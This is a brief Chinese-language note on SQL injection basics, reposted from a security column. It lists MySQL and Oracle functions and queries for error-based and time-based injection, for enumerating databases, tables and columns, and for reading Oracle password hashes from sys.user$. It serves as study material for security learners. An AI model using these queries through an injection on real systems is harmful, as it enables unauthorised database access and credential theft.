SQL注入基础

转载：https://www.freebuf.com/column/174974.html  

用以记笔记

Mysql:
version()  MySQL 版本
user()  数据库用户名
database() 数据库名
@@datadir 数据库路径
@@version_compile_os  操作系统版本
hex() 把十进制转为十六进制
concat() 连接字符串
ascii() ascii编码
length（) 获取长度
substring() mid（） 取出字符串
group_concat() 连接一个组的所有字符串 以逗号分隔每一条数据
updatexml()、extractvalue() 用于报错注入
sleep（）  休眠

猜数据库 select schema_name from information_schema.schemata
猜某库的数据表 select table_name from information_schema.tables where table_schema=’xxxxx’
猜某表的所有列 Select column_name from information_schema.columns where table_name=’xxxxx’
获取某列的内容 Select xx_column from xx_table

列出所有的数据库
select group_concat(schema_name) from information_schema.schemata

列出某个库当中所有的表
select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'

Oracle
解析IP
select utl_inaddr.get_host_address('google.com') from dual;

获取本机IP地址
select utl_inaddr.get_host_address from dual;

根据IP地址反向解析主机名
select utl_inaddr.get_host_name('*.*.*.*') from dual;

-- 获取系统信息
select banner from v$version where rownum=1 ; -- oracle versi
--获取用户信息
select user from dual; -- current user
select username from user_users; -- current user
select username from all_users; -- all user , the current user can see...
select username from dba_users; -- all user , need pris

-- 获取密码hash
select name, password, astatus from sys.user$; -- password hash <=10g , need privs
select name, password, spare4 from sys.user$; -- password has 11g , need privs

-- 数据库
select global_name from global_name; -- current database
select sys.database_name from dual; -- current database
select name from v$database; -- current database name , need privs
select instance_name from v$instance; -- current database name , need privs

-- 模式
select distinct owner from all_tables; -- all schema

-- 表
select table_name from all_tables where owner='xxx'; -- all table name

-- 列
select owner,table_name,column_name from all_tab_columns where table_name='xxx';
select owner,table_name,column_name from all_tab_cols where table_name='xxx';